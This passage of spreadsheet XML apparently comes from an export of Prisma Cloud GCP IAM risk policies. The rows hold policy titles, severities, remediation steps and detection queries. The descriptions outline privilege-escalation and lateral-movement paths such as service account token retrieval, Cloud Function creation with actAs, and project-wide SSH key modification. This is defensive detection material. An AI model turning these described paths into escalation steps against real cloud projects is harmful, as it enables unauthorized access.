Principle of Least Privilege: Always adhere to the principle of least privilege when assigning IAM permissions. Grant only the minimum level of Data Write access required for a group or service account to function effectively. Evaluate if alternative methods, like IAM conditions or granular service-specific permissions, can restrict access to specific data sets or services.
Monitor for Data Anomalies: Implement Cloud Monitoring and Cloud Logging to track data access attempts and changes within your GCP services. This vigilance can help detect unusual activity related to unused accounts that might indicate a compromise and data tampering.</t>
        </is>
      </c>
      <c r="X3283" t="inlineStr">
        <is>
          <t>Remediation steps:
 1. Log in to the GCP console
 2. Navigate to the IAM service
 3. Find the binding between the service account/group and the resources that shouldn't have broad access
 4. Remove the binding</t>
        </is>
      </c>
      <c r="Y3283" t="inlineStr"/>
      <c r="Z3283" t="inlineStr">
        <is>
          <t>config from iam where source.cloud.type = 'GCP' and grantedby.cloud.entity.type NOT IN ('user') and action.access.level = 'Data Write' and action.lastaccess.days &gt; 90</t>
        </is>
      </c>
      <c r="AA3283" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3283" t="inlineStr">
        <is>
          <t>2024-09-27 06:26:54</t>
        </is>
      </c>
      <c r="AC3283" t="inlineStr"/>
      <c r="AD3283" t="b">
        <v>1</v>
      </c>
      <c r="AE3283" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3283" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG328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3" t="inlineStr">
        <is>
          <t>403f0e7f-7afb-4465-9687-50a4e817a0dd</t>
        </is>
      </c>
      <c r="AI3283" t="inlineStr">
        <is>
          <t>403f0e7f-7afb-4465-9687-50a4e817a0dd</t>
        </is>
      </c>
      <c r="AJ3283" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3283" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3284">
      <c r="A3284" t="inlineStr"/>
      <c r="B3284" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3284" s="2" t="inlineStr"/>
      <c r="D3284" t="n">
        <v>0</v>
      </c>
      <c r="E3284" t="n">
        <v>0</v>
      </c>
      <c r="F3284" t="n">
        <v>597</v>
      </c>
      <c r="G3284" t="b">
        <v>1</v>
      </c>
      <c r="H328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4" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3284" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3284" t="inlineStr">
        <is>
          <t>GCP Compute Instance (VM/Cloud Function) Assigned Cloud Function Creation Permissions Which Could Lead to Privilege Escalation</t>
        </is>
      </c>
      <c r="L3284" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3284" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3284" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3284" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3284" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3284" t="inlineStr"/>
      <c r="R3284" t="inlineStr"/>
      <c r="S3284" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3284" t="b">
        <v>1</v>
      </c>
      <c r="U3284" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3284" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3284" t="inlineStr">
        <is>
          <t>An adversary able to create Cloud Function instances with Service Account impersonation privileges would be able to escalate their permissions creating an instance which performs attacker controlled actions using the permissions of an impersonated Service Account. This would allow them to further enumerate and exploite the environment.</t>
        </is>
      </c>
      <c r="X3284" t="inlineStr">
        <is>
          <t>Remediation steps:
 1. Sign in to GCP Console
 2.Navigate to the VM or Cloud Function instance, and remove the attached Service Account's excessive permissions.</t>
        </is>
      </c>
      <c r="Y3284"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4" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'GCP' AND source.cloud.resource.type IN ('Instances', 'functions') AND action.name CONTAINS ALL ( 'cloudfunctions.functions.create', 'cloudfunctions.functions.sourceCodeSet', 'iam.serviceAccounts.actAs' )</t>
        </is>
      </c>
      <c r="AA3284" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3284" t="inlineStr">
        <is>
          <t>2024-10-30 16:49:52</t>
        </is>
      </c>
      <c r="AC3284" t="inlineStr"/>
      <c r="AD3284" t="b">
        <v>1</v>
      </c>
      <c r="AE3284" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3284" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG328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4" t="inlineStr">
        <is>
          <t>19c079bd-d022-47c2-b590-2ef41e76585e</t>
        </is>
      </c>
      <c r="AI3284" t="inlineStr">
        <is>
          <t>19c079bd-d022-47c2-b590-2ef41e76585e</t>
        </is>
      </c>
      <c r="AJ3284" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3284" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3285">
      <c r="A3285" t="inlineStr"/>
      <c r="B3285" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3285" s="2" t="inlineStr"/>
      <c r="D3285" t="n">
        <v>0</v>
      </c>
      <c r="E3285" t="n">
        <v>0</v>
      </c>
      <c r="F3285" t="n">
        <v>712</v>
      </c>
      <c r="G3285" t="b">
        <v>1</v>
      </c>
      <c r="H32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5" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3285" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3285" t="inlineStr">
        <is>
          <t>GCP Users and Machine Identities with Administrative Permissions</t>
        </is>
      </c>
      <c r="L3285" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3285" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N3285" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3285" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3285" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3285" t="inlineStr"/>
      <c r="R3285" t="inlineStr"/>
      <c r="S3285" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T3285" t="b">
        <v>1</v>
      </c>
      <c r="U3285" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3285" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3285" t="inlineStr">
        <is>
          <t>This policy identifies GCP Users and Service Accounts with IAM Administrative Permissions.
Risk of Administrative Permissions:
GCP Users and Service Accounts with active IAM administrative permissions (elevated permissions) pose a significant security risk because:
Unfettered Access: These identities hold the "master keys" within your GCP environment. If compromised, attackers can leverage them to perform any action, including creating, modifying, or deleting critical resources. This could lead to data breaches, service disruptions, or substantial financial losses.
Privilege Escalation Potential: Some administrative permissions allow for elevating privileges of other identities. This opens the door for attackers to gain access to even more sensitive resources and systems within your GCP project.
Mitigating the Risk:
Principle of Least Privilege: Always adhere to the principle of least privilege when assigning IAM permissions. Avoid creating users or service accounts with administrative permissions unless absolutely necessary. Grant only the minimum set of permissions required for each to fulfill their specific tasks.
Multi-Factor Authentication (MFA): Enforce MFA for all GCP Users with administrative permissions. MFA adds an extra layer of security and makes it significantly harder for attackers to compromise an account, even if they obtain the credentials.
Service Account Keys: For service accounts, manage and rotate service account keys securely. Avoid storing keys in long-lived locations or embedding them directly in code. Consider using short-lived credentials or Google Cloud Key Management Service (KMS) for access control.
Restrict User Login: For increased security, consider restricting user login to specific IP addresses or regions using Security Command Center (SCC) or IAM conditions. This can help mitigate the risk of unauthorized access attempts.
GCP IAM Recommender: Utilize GCP IAM Recommender to identify and flag underused or overly permissive IAM policies associated with users and service accounts. This proactive approach helps ensure appropriate access control.
Monitor for Suspicious Activity: Utilize Stackdriver Logging to track activity logs, including actions performed by users and service accounts with administrative permissions. This vigilance can help detect unusual activity related to these entities that might indicate a compromise.
Regular Review and Auditing: Regularly review GCP user access controls and service account permissions, especially those with administrative privileges. Conduct periodic security audits to identify potential weaknesses in your IAM configuration.</t>
        </is>
      </c>
      <c r="X3285"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8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5" t="inlineStr">
        <is>
          <t>config from iam where source.cloud.type = 'GCP' and action.access.isadministrative = true</t>
        </is>
      </c>
      <c r="AA3285" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3285" t="inlineStr">
        <is>
          <t>2024-09-27 06:26:54</t>
        </is>
      </c>
      <c r="AC3285" t="inlineStr"/>
      <c r="AD3285" t="b">
        <v>1</v>
      </c>
      <c r="AE3285" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3285" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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5" t="inlineStr">
        <is>
          <t>4a40b54f-e931-4ff9-ab7f-3bd2ab61776e</t>
        </is>
      </c>
      <c r="AI3285" t="inlineStr">
        <is>
          <t>4a40b54f-e931-4ff9-ab7f-3bd2ab61776e</t>
        </is>
      </c>
      <c r="AJ3285" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3285" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3286">
      <c r="A3286" t="inlineStr"/>
      <c r="B3286" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3286" s="2" t="inlineStr"/>
      <c r="D3286" t="n">
        <v>0</v>
      </c>
      <c r="E3286" t="n">
        <v>21</v>
      </c>
      <c r="F3286" t="n">
        <v>0</v>
      </c>
      <c r="G3286" t="b">
        <v>1</v>
      </c>
      <c r="H32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6" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3286" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3286" t="inlineStr">
        <is>
          <t>GCP Cloud Function with permissions over Deployments Manager</t>
        </is>
      </c>
      <c r="L3286" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3286" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3286" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3286" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3286" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3286" t="inlineStr"/>
      <c r="R3286" t="inlineStr"/>
      <c r="S3286" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3286" t="b">
        <v>1</v>
      </c>
      <c r="U3286" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3286" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3286" t="inlineStr">
        <is>
          <t>This IAM policy for GCP's 'cloudfunctions' service orchestrates vigilant control over the potent capabilities tied to Deployment Manager. With a keen focus on deploying and updating resources, this policy reinforces a robust defense against unauthorized resource creation and modifications. By weaving together the intricacies of deploymentmanager.deployments.create and deploymentmanager.deployments.update actions, this policy establishes a formidable barrier against potential security risks. Through these measures, the policy ensures heightened protection for your GCP Cloud Function, guarding against the perils of internet exposure, privilege escalation, and lateral movements. This strategic fortification bolsters your cloud infrastructure's resilience and security</t>
        </is>
      </c>
      <c r="X3286" t="inlineStr">
        <is>
          <t>Remediation steps:
1. Log in to the GCP console
2. Navigate to the Cloud Function
3. Navigate to the IAM service
4. Find the binding between the service account used by the function instance and the Admin role
5. Remove the binding
6. Create a new binding with predefined or custom role without risky permissions, if necessary. Repeat if there is a binding of the service account with another Admin role</t>
        </is>
      </c>
      <c r="Y328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6" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'GCP' AND source.cloud.service.name = 'cloudfunctions' AND action.name IN ('deploymentmanager.deployments.create', 'deploymentmanager.deployments.update')</t>
        </is>
      </c>
      <c r="AA3286" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3286" t="inlineStr">
        <is>
          <t>2024-07-19 06:28:29</t>
        </is>
      </c>
      <c r="AC3286" t="inlineStr"/>
      <c r="AD3286" t="b">
        <v>1</v>
      </c>
      <c r="AE3286" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3286" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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6" t="inlineStr">
        <is>
          <t>10eba7aa-731e-438a-82d1-67089e848e92</t>
        </is>
      </c>
      <c r="AI3286" t="inlineStr">
        <is>
          <t>10eba7aa-731e-438a-82d1-67089e848e92</t>
        </is>
      </c>
      <c r="AJ3286" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3286" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3287">
      <c r="A3287" t="inlineStr"/>
      <c r="B3287" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3287" s="2" t="inlineStr"/>
      <c r="D3287" t="inlineStr"/>
      <c r="E3287" t="inlineStr"/>
      <c r="F3287" t="inlineStr"/>
      <c r="G3287" t="b">
        <v>1</v>
      </c>
      <c r="H32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7" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3287" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3287" t="inlineStr">
        <is>
          <t>GCP Compute Instance (VM/Cloud Function) Assigned Permissions to Retrieve Service Account Tokens Which Could Lead to Privilege Escalation</t>
        </is>
      </c>
      <c r="L3287" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3287" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3287" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3287" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3287" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3287" t="inlineStr"/>
      <c r="R3287" t="inlineStr"/>
      <c r="S3287" t="inlineStr"/>
      <c r="T3287" t="b">
        <v>1</v>
      </c>
      <c r="U3287" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3287" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3287" t="inlineStr">
        <is>
          <t>An adversary able to retrieve Service Account tokens could authenticate as high-privileged Service Accounts, escalating their original privileges. This would allow them to further enumerate and exploite the environment.</t>
        </is>
      </c>
      <c r="X3287" t="inlineStr">
        <is>
          <t>Remediation steps:
 1. Sign in to GCP Console
 2.Navigate to the VM or Cloud Function instance, and remove the attached Service Account's excessive permissions.</t>
        </is>
      </c>
      <c r="Y328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7" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'GCP' AND source.cloud.resource.type IN ('Instances', 'functions') AND action.name CONTAINS ALL ( 'iam.serviceAccounts.getAccessToken', 'iam.serviceAccounts.get' )</t>
        </is>
      </c>
      <c r="AA3287" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3287" t="inlineStr">
        <is>
          <t>2024-10-30 16:57:22</t>
        </is>
      </c>
      <c r="AC3287" t="inlineStr"/>
      <c r="AD3287" t="b">
        <v>1</v>
      </c>
      <c r="AE3287" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3287" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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7" t="inlineStr">
        <is>
          <t>101af573-5785-478e-b376-973522eb573b</t>
        </is>
      </c>
      <c r="AI3287" t="inlineStr">
        <is>
          <t>101af573-5785-478e-b376-973522eb573b</t>
        </is>
      </c>
      <c r="AJ3287" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3287" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3288">
      <c r="A3288" t="inlineStr"/>
      <c r="B3288" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3288" s="2" t="inlineStr"/>
      <c r="D3288" t="n">
        <v>869</v>
      </c>
      <c r="E3288" t="n">
        <v>177</v>
      </c>
      <c r="F3288" t="n">
        <v>710</v>
      </c>
      <c r="G3288" t="b">
        <v>1</v>
      </c>
      <c r="H328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8" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3288" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3288" t="inlineStr">
        <is>
          <t>GCP Project-Wide Lateral Movement via SSH Key Modification for VMs</t>
        </is>
      </c>
      <c r="L3288" t="inlineStr">
        <is>
          <t>RESOURCE_HIJACKING</t>
        </is>
      </c>
      <c r="M3288" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3288" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3288" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3288" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3288" t="inlineStr"/>
      <c r="R3288" t="inlineStr"/>
      <c r="S3288" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3288" t="b">
        <v>1</v>
      </c>
      <c r="U3288" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3288" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3288" t="inlineStr">
        <is>
          <t>Entities with permissions to update VM instance metadata for all project VMs and modify their SSH keys can hijack  any VM in the project, use the assigned service account to them and move laterally between Vnets, environments and resources from the accessed VM.</t>
        </is>
      </c>
      <c r="X3288" t="inlineStr">
        <is>
          <t>Remediation steps:
 1. Log in to the GCP console
 2. Navigate to the IAM service.
 3 Find the binding between the user and the role
 4. Find the role used by the service account.
 6 Remove binding with the role with risky permissions.
 7 Create a new binding with predefined or custom role without risky permissions, if necessary.</t>
        </is>
      </c>
      <c r="Y328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88" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'GCP' AND action.name = 'compute.projects.setCommonInstanceMetadata'</t>
        </is>
      </c>
      <c r="AA3288" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3288" t="inlineStr">
        <is>
          <t>2024-08-19 06:33:25</t>
        </is>
      </c>
      <c r="AC3288" t="inlineStr"/>
      <c r="AD3288" t="b">
        <v>1</v>
      </c>
      <c r="AE3288" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3288" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG328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8" t="inlineStr">
        <is>
          <t>b26f9be5-1721-4568-8940-ca2d021db6fb</t>
        </is>
      </c>
      <c r="AI3288" t="inlineStr">
        <is>
          <t>b26f9be5-1721-4568-8940-ca2d021db6fb</t>
        </is>
      </c>
      <c r="AJ3288" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3288" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3289">
      <c r="A3289" t="inlineStr"/>
      <c r="B3289" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3289" s="2" t="inlineStr"/>
      <c r="D3289" t="inlineStr"/>
      <c r="E3289" t="inlineStr"/>
      <c r="F3289" t="inlineStr"/>
      <c r="G3289" t="b">
        <v>1</v>
      </c>
      <c r="H32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89" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3289" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3289" t="inlineStr">
        <is>
          <t>GCP Groups and Service Accounts with Excessive Policies</t>
        </is>
      </c>
      <c r="L3289" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3289" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3289" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3289" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3289" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3289" t="inlineStr"/>
      <c r="R3289" t="inlineStr"/>
      <c r="S3289" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T3289" t="b">
        <v>0</v>
      </c>
      <c r="U3289" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3289" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3289" t="inlineStr">
        <is>
          <t>This policy identifies GCP roles that contain '*' in Action, and the level of role assignment is Folder or higher.
Roles with '*' in the Action section for a folder or higher scope (like organization) allow users to perform any action on any resource within that scope. This is risky because:
- Unrestricted Access: Users can bypass security measures and potentially delete critical resources or modify configurations.
- Accidental Damage: Mistakes can have a significant impact, deleting entire resources or services.
- Elevated Attack Surface: A compromised account with such a role gives attackers vast control.</t>
        </is>
      </c>
      <c r="X3289" t="inlineStr">
        <is>
          <t>Remediation steps:
 1. Log in to the GCP console
 2. Navigate to the IAM service
 3. Find the binding between the service account/group and the resources that shouldn't have broad access
 4. Remove the binding</t>
        </is>
      </c>
      <c r="Y3289" t="inlineStr"/>
      <c r="Z3289" t="inlineStr">
        <is>
          <t>config from iam where source.cloud.type = 'GCP' and grantedby.level.type IN ( 'GCP Folder', 'GCP Organization' ) and grantedby.cloud.entity.type NOT IN ('user') and grantedby.cloud.policy.isexcessive = true</t>
        </is>
      </c>
      <c r="AA3289" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3289" t="inlineStr">
        <is>
          <t>2024-09-27 06:26:54</t>
        </is>
      </c>
      <c r="AC3289" t="inlineStr"/>
      <c r="AD3289" t="b">
        <v>1</v>
      </c>
      <c r="AE3289" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3289" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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89" t="inlineStr">
        <is>
          <t>d7e6ae6e-be5d-4f61-a0db-15232d52c089</t>
        </is>
      </c>
      <c r="AI3289" t="inlineStr">
        <is>
          <t>d7e6ae6e-be5d-4f61-a0db-15232d52c089</t>
        </is>
      </c>
      <c r="AJ3289" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3289" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3290">
      <c r="A3290" t="inlineStr"/>
      <c r="B3290" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3290" s="2" t="inlineStr"/>
      <c r="D3290" t="inlineStr"/>
      <c r="E3290" t="inlineStr"/>
      <c r="F3290" t="inlineStr"/>
      <c r="G3290" t="b">
        <v>1</v>
      </c>
      <c r="H32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0" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3290" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3290" t="inlineStr">
        <is>
          <t>GCP Compute Instance (VM/Cloud Function) Assigned Cloud Run IAM Policy Edit Permissions Which Could Lead to Privilege Escalation</t>
        </is>
      </c>
      <c r="L3290" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3290" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3290" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3290" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3290" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3290" t="inlineStr"/>
      <c r="R3290" t="inlineStr"/>
      <c r="S3290" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3290" t="b">
        <v>1</v>
      </c>
      <c r="U3290" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3290" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3290" t="inlineStr">
        <is>
          <t>An adversary able to edit the IAM policy for Cloud Run instances,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90" t="inlineStr">
        <is>
          <t>Remediation steps:
 1. Sign in to GCP Console
 2.Navigate to the VM or Cloud Function instance, and remove the attached Service Account's excessive permissions.</t>
        </is>
      </c>
      <c r="Y3290"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0" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'GCP' AND source.cloud.resource.type IN ('Instances', 'functions') AND action.name CONTAINS ALL ( 'run.services.setIamPolicy', 'iam.serviceAccounts.actAs' )</t>
        </is>
      </c>
      <c r="AA3290" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3290" t="inlineStr">
        <is>
          <t>2024-10-30 16:49:52</t>
        </is>
      </c>
      <c r="AC3290" t="inlineStr"/>
      <c r="AD3290" t="b">
        <v>1</v>
      </c>
      <c r="AE3290" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3290" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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0" t="inlineStr">
        <is>
          <t>0cc37adf-957f-4681-8043-88faee0515eb</t>
        </is>
      </c>
      <c r="AI3290" t="inlineStr">
        <is>
          <t>0cc37adf-957f-4681-8043-88faee0515eb</t>
        </is>
      </c>
      <c r="AJ3290" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3290" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3291">
      <c r="A3291" t="inlineStr"/>
      <c r="B3291" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3291" s="2" t="inlineStr"/>
      <c r="D3291" t="n">
        <v>0</v>
      </c>
      <c r="E3291" t="n">
        <v>596</v>
      </c>
      <c r="F3291" t="n">
        <v>0</v>
      </c>
      <c r="G3291" t="b">
        <v>1</v>
      </c>
      <c r="H32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1" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3291" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3291" t="inlineStr">
        <is>
          <t>GCP VM instance with database management write access permissions</t>
        </is>
      </c>
      <c r="L3291" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3291" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3291" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3291" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3291" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3291" t="inlineStr"/>
      <c r="R3291" t="inlineStr"/>
      <c r="S3291" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3291" t="b">
        <v>1</v>
      </c>
      <c r="U3291" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3291" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3291" t="inlineStr">
        <is>
          <t>The policy restricts write access of GCP VM instances to DB such as Cloud SQL, Datastore, BigTable etc.(https://gcp.permissions.cloud/iam/gcp), aiming to prevent unauthorized modifications to critical database services hosted on GCP. It enhances security by enforcing granular access control and aligning with the principle of least privilege.</t>
        </is>
      </c>
      <c r="X3291"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91"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1" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'GCP' AND source.cloud.type = 'GCP' AND source.cloud.service.name = 'compute' and source.cloud.resource.type = 'Instances' AND action.name IN ('cloudsql.databases.update','cloudsql.instances.update','datastore.databases.update','datastore.entities.update','datastore.indexes.update','spanner.databases.update','spanner.databases.write','spanner.instances.update','bigtable.clusters.update','bigtable.instances.update','bigtable.tables.update','redis.instances.update','memcache.instances.update','datamigration.migrationjobs.update','datamigration.connectionprofiles.update','datamigration.conversionworkspaces.update','alloydb.clusters.update','alloydb.instances.update','gcp.redisenterprise.com-databases.update','gcp.redisenterprise.com-subscriptions.update')</t>
        </is>
      </c>
      <c r="AA3291" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3291" t="inlineStr">
        <is>
          <t>2024-10-30 16:57:22</t>
        </is>
      </c>
      <c r="AC3291" t="inlineStr"/>
      <c r="AD3291" t="b">
        <v>1</v>
      </c>
      <c r="AE3291" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3291" t="inlineStr">
        <is>
          <t>risk</t>
